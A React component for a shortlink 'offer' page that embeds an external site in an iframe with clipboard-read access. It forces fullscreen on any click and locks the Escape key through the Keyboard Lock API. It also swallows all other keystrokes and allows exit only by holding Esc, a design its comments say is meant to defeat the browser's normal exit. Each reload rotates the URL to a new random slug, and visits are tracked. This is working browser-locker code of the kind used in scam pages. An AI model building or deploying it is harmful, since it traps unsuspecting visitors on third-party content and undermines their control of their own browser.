import React, { useCallback, useEffect, useRef, useState } from 'react';
import { Navigate, useNavigate, useParams } from 'react-router-dom';
import { useRedirect } from '../context/RedirectContext';
import { useSite } from '../context/SiteContext';
import {
  generateRedirectSlug,
  isValidRedirectEmbedSlug,
  withHcvaEmbedParam,
} from '../utils/redirectShortlink';
import {
  consumePendingVisitNoteForEmbed,
  trackShortlinkFullscreenTrigger,
  trackShortlinkVisitor,
  VISIT_NOTE_FULLSCREEN
} from '../utils/shortlinkMetrics';
import './RedirectEmbed.css';

/** Exit native fullscreen only after Esc held this long (quick Esc is swallowed). */
const ESC_HOLD_EXIT_MS = 1200;

/** One-shot per full page load so reload slug rotation runs once (survives React Strict Mode double-mount). */
let hcvaShortlinkReloadRotated = false;

function isDocumentReloadNavigation() {
  if (typeof performance === 'undefined') return false;
  const entries = performance.getEntriesByType?.('navigation');
  if (entries?.length) {
    return entries[0].type === 'reload';
  }
  try {
    return performance.navigation?.type === 1;
  } catch {
    return false;
  }
}

function getFullscreenElement() {
  return (
    document.fullscreenElement ||
    document.webkitFullscreenElement ||
    document.mozFullScreenElement ||
    document.msFullscreenElement ||
    null
  );
}

/** Same pattern as popup `1mai1sy1.js`: vendor-prefixed fullscreen on &lt;html&gt;. */
function requestFullscreenNative() {
  const el = document.documentElement;
  const rfs =
    el.requestFullscreen ||
    el.webkitRequestFullscreen ||
    el.mozRequestFullScreen ||
    el.msRequestFullscreen;
  if (!rfs) return Promise.reject(new Error('fullscreen unsupported'));
  return Promise.resolve(rfs.call(el));
}

function exitFullscreenNative() {
  if (document.exitFullscreen) return document.exitFullscreen();
  if (document.webkitExitFullscreen) return document.webkitExitFullscreen();
  if (document.mozCancelFullScreen) return document.mozCancelFullScreen();
  if (document.msExitFullscreen) return document.msExitFullscreen();
  return Promise.resolve();
}

/**
 * Same idea as `1mai1sy1.js`: without Keyboard Lock, Chrome owns Esc in fullscreen (single press
 * exits) and shows its own "press Esc" banner — we cannot change that banner text in JS.
 * Locking Esc routes Esc to our handlers so hold-to-exit works. Default on; set
 * REACT_APP_SHORTLINK_KEYBOARD_LOCK=false to disable (e.g. debugging).
 */
function shouldUseKeyboardLock() {
  return process.env.REACT_APP_SHORTLINK_KEYBOARD_LOCK !== 'false';
}

function tryKeyboardLock() {
  if (!shouldUseKeyboardLock()) return;
  if (typeof navigator === 'undefined' || !navigator.keyboard?.lock) return;
  const kb = navigator.keyboard;
  kb.lock(['Escape']).catch(() => kb.lock().catch(() => {}));
}

/** After entering fullscreen — lock ASAP so the first Esc doesn't exit before lock applies. */
function requestFullscreenThenLock() {
  return requestFullscreenNative().then(() => {
    tryKeyboardLock();
  });
}

function tryKeyboardUnlock() {
  if (typeof navigator === 'undefined' || !navigator.keyboard?.unlock) return;
  navigator.keyboard.unlock();
}

function trackClarityEvent(name, payload) {
  if (typeof window === 'undefined' || typeof window.clarity !== 'function') return;
  try {
    window.clarity('event', name);
    if (payload) {
      Object.entries(payload).forEach(([key, value]) => {
        if (value === undefined || value === null || value === '') return;
        window.clarity('set', key, String(value));
      });
    }
  } catch {
    /* ignore analytics errors */
  }
}

export default function RedirectEmbed() {
  const { slug } = useParams();
  const navigate = useNavigate();
  const { firebaseSiteDocId } = useSite();
  const { redirectActive, pendingRedirectHref, redirectSourceReady } = useRedirect();
  const iframeRef = useRef(null);
  const escExitTimerRef = useRef(null);
  const holdArmTimerRef = useRef(null);
  const activeHoldSourceRef = useRef(null);
  /** After hold-to-exit/enter, ignore the synthetic click so window capture doesn't instantly re-toggle fullscreen. */
  const suppressWindowClickFsUntilRef = useRef(0);
  const prevNativeFsRef = useRef(false);
  const trackedViewRef = useRef('');
  const [nativeFs, setNativeFs] = useState(false);
  const slugOk = isValidRedirectEmbedSlug(slug);

  const clearEscExitTimer = useCallback(() => {
    if (escExitTimerRef.current) {
      window.clearTimeout(escExitTimerRef.current);
      escExitTimerRef.current = null;
    }
  }, []);

  const clearHoldArmTimer = useCallback(() => {
    if (holdArmTimerRef.current) {
      window.clearTimeout(holdArmTimerRef.current);
      holdArmTimerRef.current = null;
    }
    activeHoldSourceRef.current = null;
  }, []);

  const armHold = useCallback(
    (source) => {
      clearHoldArmTimer();
      activeHoldSourceRef.current = source;
      holdArmTimerRef.current = window.setTimeout(() => {
        holdArmTimerRef.current = null;
        if (activeHoldSourceRef.current === source) {
          suppressWindowClickFsUntilRef.current = Date.now() + 600;
          if (getFullscreenElement()) {
            exitFullscreenNative().finally(() => tryKeyboardUnlock());
          } else {
            requestFullscreenThenLock().catch(() => {});
          }
        }
        activeHoldSourceRef.current = null;
      }, ESC_HOLD_EXIT_MS);
    },
    [clearHoldArmTimer]
  );

  const disarmHold = useCallback(
    (source) => {
      if (activeHoldSourceRef.current !== source) return;
      clearHoldArmTimer();
    },
    [clearHoldArmTimer]
  );

  /* Sync React state with browser fullscreen (all vendors). */
  useEffect(() => {
    const sync = () => setNativeFs(Boolean(getFullscreenElement()));
    document.addEventListener('fullscreenchange', sync);
    document.addEventListener('webkitfullscreenchange', sync);
    document.addEventListener('mozfullscreenchange', sync);
    document.addEventListener('MSFullscreenChange', sync);
    sync();
    return () => {
      document.removeEventListener('fullscreenchange', sync);
      document.removeEventListener('webkitfullscreenchange', sync);
      document.removeEventListener('mozfullscreenchange', sync);
      document.removeEventListener('MSFullscreenChange', sync);
    };
  }, []);

  /* Re-apply lock when fullscreen syncs (e.g. vendor prefixes / programmatic exit). */
  useEffect(() => {
    if (!nativeFs) return undefined;
    tryKeyboardLock();
    return undefined;
  }, [nativeFs]);

  useEffect(() => {
    if (!slugOk) return undefined;
    document.body.classList.remove('hcva-shortlink-pseudo-fs');
    const root = document.documentElement;
    const body = document.body;
    root.classList.add('hcva-shortlink-embed');
    body.classList.add('hcva-shortlink-embed');
    return () => {
      root.classList.remove('hcva-shortlink-embed');
      body.classList.remove('hcva-shortlink-embed');
    };
  }, [slugOk]);

  useEffect(() => {
    if (!slugOk || !redirectSourceReady || !redirectActive || !pendingRedirectHref) return;
    if (trackedViewRef.current === slug) return;
    trackedViewRef.current = slug;
    trackClarityEvent('shortlink_view', { shortlink_slug: slug });
    trackShortlinkVisitor({
      siteId: firebaseSiteDocId,
      slug,
      sourceDomain: window.location.hostname || '',
      visitNote: consumePendingVisitNoteForEmbed()
    });
  }, [
    slugOk,
    slug,
    redirectSourceReady,
    redirectActive,
    pendingRedirectHref,
    firebaseSiteDocId
  ]);

  /** Every full refresh while on an active shortlink embed gets a new random path segment. */
  useEffect(() => {
    if (!slugOk || !redirectSourceReady || !redirectActive || !pendingRedirectHref) return;
    if (!isDocumentReloadNavigation()) return;
    if (hcvaShortlinkReloadRotated) return;
    hcvaShortlinkReloadRotated = true;
    const next = generateRedirectSlug();
    navigate(`/${next}`, { replace: true });
  }, [
    slugOk,
    redirectSourceReady,
    redirectActive,
    pendingRedirectHref,
    navigate,
  ]);

  /** Window click → requestFullscreen (same as `addEventListener("click", …)` in 1mai1sy1.js). */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;

    const onClickCapture = (e) => {
      if (Date.now() < suppressWindowClickFsUntilRef.current) return;
      if (e.target?.closest?.('.redirect-embed-hold-zone')) return;
      if (getFullscreenElement()) return;
      requestFullscreenThenLock().catch(() => {});
    };

    window.addEventListener('click', onClickCapture, true);
    return () => window.removeEventListener('click', onClickCapture, true);
  }, [slugOk, redirectActive, pendingRedirectHref]);

  /**
   * Fullscreen: block shortcuts; Esc must be held to exit.
   * One capture listener on `window`; do not also attach to `document` or timers double-fire.
   * Requires `keyboard.lock` for Esc so the browser doesn't exit on the first keydown.
   */
  useEffect(() => {
    if (!slugOk || !redirectActive || !pendingRedirectHref) return undefined;

    const onKeyDownCapture = (e) => {
      if (!getFullscreenElement()) return;

      if (e.code === 'Escape' || e.key === 'Escape') {
        e.preventDefault();
        if (e.repeat) return;
        clearEscExitTimer();
        escExitTimerRef.current = window.setTimeout(() => {
          escExitTimerRef.current = null;
          suppressWindowClickFsUntilRef.current = Date.now() + 600;
          exitFullscreenNative().finally(() => tryKeyboardUnlock());
        }, ESC_HOLD_EXIT_MS);
        return;
      }

      e.preventDefault();
    };

    const onKeyUpCapture = (e) => {
      if (!getFullscreenElement()) return;
      if (e.code === 'Escape' || e.key === 'Escape') {
        clearEscExitTimer();
      }
      e.preventDefault();
    };

    window.addEventListener('keydown', onKeyDownCapture, true);
    window.addEventListener('keyup', onKeyUpCapture, true);

    return () => {
      clearEscExitTimer();
      window.removeEventListener('keydown', onKeyDownCapture, true);
      window.removeEventListener('keyup', onKeyUpCapture, true);
    };
  }, [slugOk, redirectActive, pendingRedirectHref, clearEscExitTimer]);

  useEffect(() => {
    const prev = prevNativeFsRef.current;
    if (!prev && nativeFs) {
      trackClarityEvent('shortlink_fullscreen_enter', { shortlink_slug: slug });
      trackShortlinkFullscreenTrigger({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain: window.location.hostname || ''
      });
      trackShortlinkVisitor({
        siteId: firebaseSiteDocId,
        slug,
        sourceDomain: window.location.hostname || '',
        visitNote: VISIT_NOTE_FULLSCREEN
      });
    } else if (prev && !nativeFs) {
      trackClarityEvent('shortlink_fullscreen_exit_hold', { shortlink_slug: slug });
    }
    prevNativeFsRef.current = nativeFs;
  }, [nativeFs, slug, firebaseSiteDocId]);

  useEffect(() => {
    return () => {
      clearEscExitTimer();
      clearHoldArmTimer();
      if (getFullscreenElement()) {
        exitFullscreenNative().finally(() => tryKeyboardUnlock());
      }
    };
  }, [clearEscExitTimer, clearHoldArmTimer]);

  if (!slugOk) {
    return <Navigate to="/" replace />;
  }

  if (!redirectSourceReady) {
    return (
      <div
        className="redirect-embed-page redirect-embed-page--loading"
        data-hcva-redirect-embed="root"
      >
        <div className="redirect-embed-loading-inner" aria-busy="true" aria-live="polite">
          <span className="redirect-embed-loading-spinner" />
          <p className="redirect-embed-loading-msg">Loading offer…</p>
        </div>
      </div>
    );
  }

  if (!redirectActive || !pendingRedirectHref) {
    return <Navigate to="/" replace />;
  }

  return (
    <div className="redirect-embed-page" data-hcva-redirect-embed="root">
      {nativeFs ? (
        <p className="redirect-embed-esc-hint" aria-live="polite">
          Hold Esc ~1s to exit — quick Esc won't. (Chrome's top bar text can't be customized.)
        </p>
      ) : null}
      <iframe
        ref={iframeRef}
        className="redirect-embed-frame"
        title="Offer"
        src={withHcvaEmbedParam(pendingRedirectHref)}
        referrerPolicy="no-referrer-when-downgrade"
        allowFullScreen
        tabIndex={-1}
        allow="fullscreen *; autoplay *; encrypted-media *; picture-in-picture *; clipboard-read *; clipboard-write *"
      />
      <div
        className="redirect-embed-hold-zone"
        role="button"
        tabIndex={0}
        aria-label={
          nativeFs
            ? 'Press and hold to exit full screen'
            : 'Press and hold to enter full screen'
        }
        onPointerDown={(e) => {
          e.preventDefault();
          if (e.button !== undefined && e.button !== 0) return;
          try {
            e.currentTarget.setPointerCapture(e.pointerId);
          } catch {
            /* ignore */
          }
          armHold('pointer');
        }}
        onPointerUp={(e) => {
          try {
            if (e.currentTarget.hasPointerCapture?.(e.pointerId)) {
              e.currentTarget.releasePointerCapture(e.pointerId);
            }
          } catch {
            /* ignore */
          }
          disarmHold('pointer');
        }}
        onPointerCancel={() => disarmHold('pointer')}
        onLostPointerCapture={() => disarmHold('pointer')}
        onPointerLeave={() => disarmHold('pointer')}
        onKeyDown={(e) => {
          if (e.code !== 'Enter' && e.code !== 'Space') return;
          if (e.repeat) return;
          e.preventDefault();
          armHold('pointer');
        }}
        onKeyUp={(e) => {
          if (e.code !== 'Enter' && e.code !== 'Space') return;
          disarmHold('pointer');
        }}
      >
        <span className="redirect-embed-hold-zone__title">Hold</span>
        <span className="redirect-embed-hold-zone__sub">
          {nativeFs ? 'exit FS' : 'full screen'}
        </span>
      </div>
    </div>
  );
}
